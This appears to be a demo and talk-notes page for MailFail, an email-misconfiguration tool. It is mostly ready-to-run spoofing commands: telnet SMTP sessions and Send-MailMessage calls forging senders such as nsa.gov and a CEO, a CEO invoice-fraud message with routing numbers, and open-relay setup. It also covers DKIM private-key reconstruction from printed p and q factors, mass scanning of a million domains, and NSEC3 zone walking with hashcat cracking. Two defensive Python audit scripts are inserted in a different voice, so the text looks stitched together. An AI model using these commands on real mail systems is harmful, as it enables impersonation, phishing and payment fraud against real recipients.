MailFail: A Tool for Detecting and Exploiting Email Security Misconfigurations

MailFail is a Firefox browser extension built to detect and exploit email-related security misconfigurations. This article covers the tool's features, its demo scenarios (including SPF/DKIM/DMARC bypass and DKIM key cracking) and practical use cases, walking through the complete workflow from basic configuration checks to advanced attack techniques.

MailFail

MailFail is a Firefox browser extension that identifies a large number of email-related misconfigurations on the current domain and its subdomains and provides the commands to exploit them. The extension's UI popup highlights any misconfiguration in red and links to supporting documentation.

Resources

MailFail Webinar Demos

Demo 1: Sending email over SMTP

dig MX {{TODO}} +short
telnet {{ TODO }} 25
HELO nsa.gov
MAIL FROM: <jack@nsa.gov>
RCPT TO: {{ TODO }}
DATA
Content-Type: multipart/mixed; boundary="NextMimePart"
From: security@nsa.gov
To: {{ TODO }}
Subject: Snowden

--NextMimePart
Content-type: text/html;

We forgive you :(
.

Demo 2: Sending email with Send-MailMessage

dig MX ilebi.com +short
Send-MailMessage -SmtpServer 96-126-99-62.ip.linodeusercontent.com -To ytt50349@ilebi.com -From jack@harvard.edu -Subject "Congrats!" -Body "You've been accepted!" -BodyAsHTML

Demo 3: Bypassing SPF

dig TXT spf.m.ail.fail +short
curl ifconfig.me

telnet mailsec.protonmail.ch 25
HELO spf.m.ail.fail
MAIL FROM: <jack@billyjoel.com>
RCPT TO: <mymailfail42@proton.me>
DATA
Content-Type: multipart/mixed; boundary="NextMimePart"
From: jack@billyjoel.com
To: mymailfail42@proton.me
Subject: Piano Man
Message-ID: <unique-message-id@example.com>

--NextMimePart
Content-Type: text/html;

Sing us a song.
.

Demo 4: Bypassing DKIM

openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:1024 -out dkim_1024_private.pem
openssl rsa -pubout -in dkim_1024_private.pem -out dkim_1024_public.pem
cat dkim_1024_public.pem
dig TXT dkim1024._domainkey.m.ail.fail +short
# https://gist.github.com/ACK-J/76585af46375641ec841cb6b77d345c3
wget https://gist.githubusercontent.com/ACK-J/76585af46375641ec841cb6b77d345c3/raw/e52f1a8ae9f83dd080d7a75e27d505dff5350d9b/Send_DKIM_Email.py
vim Send_DKIM_Email.py
python3 Send_DKIM_Email.py

Demo 5: Cracking a DKIM key

dig TXT smtpapi._domainkey.m.ail.fail +short
# https://gist.github.com/ACK-J/487d0de5737458d953ca818a0645b09b
wget https://gist.githubusercontent.com/ACK-J/487d0de5737458d953ca818a0645b09b/raw/817e9d3c0faeb81844a4a81be6818d582ff493ea/Reconstruct_Private_RSA_Key.py
# Private key values p and q
# 114243475724741248833595122844512882880944338610909134738011440161029226847479
# 98382782872834099683871479139393781262822034994021043042450594450215266838447
vim Reconstruct_Private_RSA_Key.py
python3 Reconstruct_Private_RSA_Key.py
cat > cracked_private_key.pem
# https://gist.github.com/ACK-J/76585af46375641ec841cb6b77d345c3
vim Send_DKIM_Email.py
python3 Send_DKIM_Email.py

Demo 5: DMARC misconfiguration check

https://gist.github.com/ACK-J/8a189bafbb54e00fb1b3f3e22dcd81c9

WWHF Talk Demos

Bypassing SPF and DMARC through an SMTP open relay

# A website that checks for SMTP open relays
https://tools.appriver.com/OpenRelay.aspx?server=209.38.78.151

# Install postfix as an open relay
sudo apt install postfix
sudo nano /etc/postfix/main.cf
# Add the following lines
mynetworks = 0.0.0.0/0 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
permit_mynetworks = yes
# Restart postfix
sudo service postfix restart

# Scan for open relays with Nmap
nmap -p 25,587,465 -v --open --script smtp-open-relay 209.38.78.151 | grep "Server is an open relay|MAIL FROM:" -B 6

# Use the open relay
telnet 209.38.78.151 25
HELO smtprelay.me
MAIL FROM: <jack@smtprelay.me>
RCPT TO: <mymailfail42@gmail.com>
DATA
Content-Type: multipart/mixed; boundary="NextMimePart"
From: jack@smtprelay.me
To: mymailfail42@gmail.com
Subject: Did that invoice go out?

--NextMimePart
Content-Type: text/html;

Hey Mike, this is Jack, your CEO. Did you ever send out that invoice for the holiday party?
If not, here are the routing numbers:
1234567890

I've attached the invoice for your convenience. You should get this done ASAP, or it will affect your performance review.

Sincerely,
Your Boss
.

Cracking a DKIM RSA key

dig TXT smtpapi._domainkey.m.ail.fail +short
# https://gist.github.com/ACK-J/487d0de5737458d953ca818a0645b09b
wget https://gist.githubusercontent.com/ACK-J/487d0de5737458d953ca818a0645b09b/raw/817e9d3c0faeb81844a4a81be6818d582ff493ea/Reconstruct_Private_RSA_Key.py
# Private key values p and q
# 114243475724741248833595122844512882880944338610909134738011440161029226847479
# 98382782872834099683871479139393781262822034994021043042450594450215266838447
vim Reconstruct_Private_RSA_Key.py
python3 Reconstruct_Private_RSA_Key.py
cat > cracked_private_key.pem
# https://gist.github.com/ACK-J/76585af46375641ec841cb6b77d345c3
vim Send_DKIM_Email.py
python3 Send_DKIM_Email.py
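The defensive counterpart to the key-cracking steps in Demo 5 and in this section, added here as an example (not MailFail's code or the author's gists): it reads the p= tag of a DKIM TXT record, walks the DER SubjectPublicKeyInfo and reports the RSA modulus size, so selectors publishing short keys can be found and rotated. The records are constructed samples with synthetic moduli, and rsa_spki_base64 exists only to build them.

```python
import base64
import re

def _der_len(n: int) -> bytes:
    """DER length: short form below 128, long form (0x8N + N length bytes) otherwise."""
    if n < 128:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def _der(tag: int, content: bytes) -> bytes:
    return bytes([tag]) + _der_len(len(content)) + content

def _der_int(v: int) -> bytes:
    body = v.to_bytes((v.bit_length() + 7) // 8, "big")
    if body[0] & 0x80:            # leading zero keeps the INTEGER positive
        body = b"\x00" + body
    return _der(0x02, body)

def rsa_spki_base64(n: int, e: int = 65537) -> str:
    """Encode an RSA SubjectPublicKeyInfo as a DKIM p= value (used here only to build samples)."""
    alg = _der(0x30, bytes.fromhex("06092A864886F70D010101") + b"\x05\x00")  # rsaEncryption OID + NULL
    key = _der(0x30, _der_int(n) + _der_int(e))                              # RSAPublicKey {n, e}
    return base64.b64encode(_der(0x30, alg + _der(0x03, b"\x00" + key))).decode()

def _der_walk(buf: bytes, pos: int = 0):
    """Read one TLV at pos and return (tag, content, position after it)."""
    tag, ln = buf[pos], buf[pos + 1]
    pos += 2
    if ln & 0x80:                 # long-form length
        nbytes = ln & 0x7F
        ln = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + ln], pos + ln

def dkim_modulus_bits(record: str) -> int:
    """Modulus size of the RSA key in a DKIM TXT record; 0 if p= is empty (revoked) or missing."""
    clean = record.replace('"', "").replace(" ", "")   # dig splits long TXT records into quoted chunks
    m = re.search(r"(?:^|;)p=([A-Za-z0-9+/=]*)", clean)
    if not m or not m.group(1):
        return 0
    _, spki, _ = _der_walk(base64.b64decode(m.group(1)))  # SubjectPublicKeyInfo SEQUENCE
    _, _, after_alg = _der_walk(spki)                      # skip AlgorithmIdentifier
    _, bits, _ = _der_walk(spki, after_alg)                # BIT STRING wrapping RSAPublicKey
    _, rsa, _ = _der_walk(bits[1:])                        # drop the unused-bits byte
    _, n, _ = _der_walk(rsa)                               # first INTEGER is the modulus
    return int.from_bytes(n, "big").bit_length()

def audit_dkim(record: str, minimum: int = 2048) -> str:
    bits = dkim_modulus_bits(record)
    if bits == 0:
        return "no key published (revoked selector or malformed record)"
    return "OK" if bits >= minimum else f"weak {bits}-bit RSA key: rotate to at least {minimum} bits"

# Constructed sample records in dig output form (synthetic moduli, not real keys).
WEAK_RECORD = f'"v=DKIM1; k=rsa; " "p={rsa_spki_base64((1 << 511) | 1)}"'
STRONG_RECORD = f'"v=DKIM1; k=rsa; p={rsa_spki_base64((1 << 2047) | 1)}"'
```

Feed it the output of `dig TXT <selector>._domainkey.<domain> +short` to check a real selector; anything reported below 1024 bits is within reach of the factoring shown above.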

Finding SPF/DMARC misconfigurations

# Download the script that checks for DMARC and SPF misconfigurations
wget https://gist.githubusercontent.com/ACK-J/8a189bafbb54e00fb1b3f3e22dcd81c9/raw/5ad366adf6abdaaf981fd8bede5223f543e4242c/DMARC_and_SPF_Check.py
# Download the file of the top one million domains
wget https://downloads.majesticseo.com/majestic_million.csv
# Format the file
cat majestic_million.csv | tail -n +2 | cut -d ',' -f 3 > majestic_million.csv.txt
# Run the script against the formatted file
python3 DMARC_and_SPF_Check.py majestic_million.csv.txt

# Show that the domain's SPF record points to my current IP address
dig TXT spf.m.ail.fail +short
# Show my current IP
curl ifconfig.me

# Connect to Proton Mail's mail server
# Spoof SPF
# Exploit the domain's misconfigured SPF and DMARC records
telnet mailsec.protonmail.ch 25
HELO spf.m.ail.fail
MAIL FROM: <jack@spf.m.ail.fail>
RCPT TO: <mymailfail42@proton.me>
DATA
Content-Type: multipart/mixed; boundary="NextMimePart"
To: mymailfail42@proton.me
From: vader@starwars.com
Subject: Your Inbox Has Fallen to the Dark Side

--NextMimePart
Content-Type: text/html;

I find your email habits... disturbing.

Effective immediately:

- "Free lightsaber!" will trigger a full investigation by the Empire.

May the inbox be with you.

Darth Vader

Sith Lord & Email Administrator

.

Spoofing misconfigured DMARC and SPF

# Open a Cloud Shell at portal.azure.com
# Get the victim domain's MX record and substitute it for the SMTP server below
# If your IP is blocked by Spamhaus, restart the Cloud Shell to get a new IP
Send-MailMessage -SmtpServer example-com.mail.protection.outlook.com -To "Victim@example.com" -From "ceo@BadDMARC.com" -Subject "Misconfigured DMARC" -Body "Misconfigured DMARC" -BodyAsHTML -DeliveryNotificationOption Never -UseSsl

Spoofing DMARC pct!=100

# Download the script that checks for DMARC and SPF misconfigurations
wget https://gist.githubusercontent.com/ACK-J/8a189bafbb54e00fb1b3f3e22dcd81c9/raw/5ad366adf6abdaaf981fd8bede5223f543e4242c/DMARC_and_SPF_Check.py
# Download the file of the top one million domains
wget https://downloads.majesticseo.com/majestic_million.csv
# Format the file
cat majestic_million.csv | tail -n +2 | cut -d ',' -f 3 > majestic_million.csv.txt
# Check for domains whose DMARC policy contains pct=
python3 DMARC_and_SPF_Check.py majestic_million.csv.txt | grep "less than 100%"

# An easy way to send spoofed mail is the Cloud Shell on portal.azure.com

# Replace the SMTP server and victim mailbox below
Send-MailMessage -SmtpServer example-com.mail.protection.outlook.com -To victim@example.com -From jack@epicgames.com -Subject "Howdy" -Body "Misconfigured DMARC" -BodyAsHTML -DeliveryNotificationOption Never -UseSsl
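The record checks behind the DMARC check in Demo 5, the "Finding SPF/DMARC misconfigurations" section and this pct section, written as an added example rather than the author's DMARC_and_SPF_Check.py: it audits one SPF and one DMARC record offline (strings as printed by `dig TXT ... +short`) and names each setting that leaves spoofed mail deliverable, including pct below 100. The records in the assertions are constructed samples.

```python
from typing import Dict, List, Optional

def parse_tags(record: str) -> Dict[str, str]:
    """Split a 'tag=value; tag=value' record into a dict, dropping the quotes dig prints."""
    tags: Dict[str, str] = {}
    for part in record.replace('"', "").split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags

def audit_spf(record: Optional[str]) -> List[str]:
    """Flag SPF terms that let an unlisted host pass, or only soft-fail, the SPF check."""
    if record is None or not record.replace('"', "").strip().lower().startswith("v=spf1"):
        return ["no SPF record: any host can claim to send for the domain"]
    terms = [t.lower() for t in record.replace('"', "").split()[1:]]
    findings: List[str] = []
    if "+all" in terms or "all" in terms:
        findings.append("+all: every sending host passes SPF")
    elif "?all" in terms:
        findings.append("?all (neutral): unlisted hosts are neither passed nor failed")
    elif "~all" in terms:
        findings.append("~all (softfail): delivery of spoofed mail depends on the receiver")
    elif "-all" not in terms and not any(t.startswith("redirect=") for t in terms):
        findings.append("no all mechanism: evaluates to neutral for unlisted hosts")
    return findings

def audit_dmarc(record: Optional[str]) -> List[str]:
    """Flag DMARC settings under which SPF/DKIM failures are not enforced for all mail."""
    if record is None:
        return ["no DMARC record: SPF/DKIM results are never enforced"]
    tags = parse_tags(record)
    if tags.get("v", "").upper() != "DMARC1":
        return ["malformed DMARC record: missing v=DMARC1 tag"]
    findings: List[str] = []
    policy = tags.get("p", "none").lower()
    if policy == "none":
        findings.append("p=none: failures are only reported, never quarantined or rejected")
    pct_raw = tags.get("pct", "100")
    pct = int(pct_raw) if pct_raw.isdigit() else 100      # pct defaults to 100 when absent
    if pct < 100:
        findings.append(f"pct={pct}: {100 - pct}% of failing mail skips the {policy} policy")
    if policy != "none" and tags.get("sp", policy).lower() == "none":
        findings.append("sp=none: subdomains are exempt from the organizational policy")
    if "rua" not in tags:
        findings.append("no rua= tag: aggregate reports are not being collected")
    return findings
```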

Spoofing internal mail via Direct Send

# Replace the SMTP server with the M365 MX record, and replace the To and From fields
Send-MailMessage -SmtpServer example-com.mail.protection.outlook.com -To victim@vulnerable.com -From ceo@vulnerable.com -Subject "Microsoft Direct Send Spoofing Test" -Body "Microsoft Direct Send Spoofing Test" -BodyAsHTML -DeliveryNotificationOption Never -UseSsl

NSEC walking

# Install dependencies
sudo apt-get install pipx python3 python3-pip python3-dev gcc libssl3 libssl-dev
# Install n3map with pipx
pipx install n3map[predict]
# NSEC walk stanford.edu
n3map -v -A --output www.stanford.edu.zone stanford.edu
# View the results
vim www.stanford.edu.zone

NSEC3 walking and cracking

# Install dependencies
sudo apt-get install pipx python3 python3-pip python3-dev gcc libssl3 libssl-dev
# Install n3map with pipx
pipx install n3map[predict]
# NSEC3 walk nsa.gov
n3map -v -A --output nsa.gov.zone nsa.gov --predict
# View the results
vim nsa.gov.zone
# Convert the results to hashcat format
n3map-hashcatify nsa.gov.zone nsa.gov.hashcat
# Crack the subdomains with hashcat
hashcat --potfile-disable -m 8300 nsa.gov.hashcat /opt/wordlists/goldmine-2024-small.txt

Spoofing the Reply-To: header

# Show that the domain's SPF record points to my current IP address
dig TXT spf.m.ail.fail +short
# Show my current IP
curl ifconfig.me

# Connect to protonmail's SMTP server
# Spoof SPF
# Include a Reply-To: header with a different address
telnet mailsec.protonmail.ch 25
HELO spf.m.ail.fail
MAIL FROM: <jack@spf.m.ail.fail>
RCPT TO: <mymailfail42@proton.me>
DATA
Content-Type: multipart/mixed; boundary="NextMimePart"
To: mymailfail42@proton.me
Reply-To: vader@starwars-corp.com
From: vader@starwars.com
Subject: Your Inbox Has Fallen to the Dark Side

--NextMimePart
Content-Type: text/html;

I find your email habits... disturbing.

Effective immediately:

- "Free lightsaber!" will trigger a full investigation by the Empire.

May the inbox be with you.

Darth Vader

Sith Lord & Email Administrator

.